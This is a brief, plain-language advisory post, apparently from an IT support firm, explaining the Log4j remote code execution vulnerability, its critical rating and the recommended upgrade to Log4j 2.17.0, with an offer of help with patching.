By now you may have already heard of the Log4J vulnerability. If you haven’t, here is an easy to digest update on the current situation.
What is it?
Simply put, it is a vulnerability in a logging framework that is very widely used. If exploited, it allows an attacker remote code execution and the possibility to completely take over your system.
Log4J / Log4j was given a CVSS rating of 10.0 (Critical) which is the highest score.
It was initially thought that only exposed web servers were vulnerable. Unfortunately this is not the case, and even internal systems can be compromised by something as simple as browsing to a malicious website that triggers the exploit with Javascript.
For vendors, the best recommendation at this point is to upgrade to Log4j 2.17.0. For end users and system administrators, the current challenge isn’t just fixing it; it is finding out where you need to fix it.
You may have already had some of your software vendors or your IT team (if you have one) reach out regarding this or maybe they have been working on getting you patched behind the scenes.
If not, and/or you think you may be vulnerable and require assistance in investigating or patching, please reach out.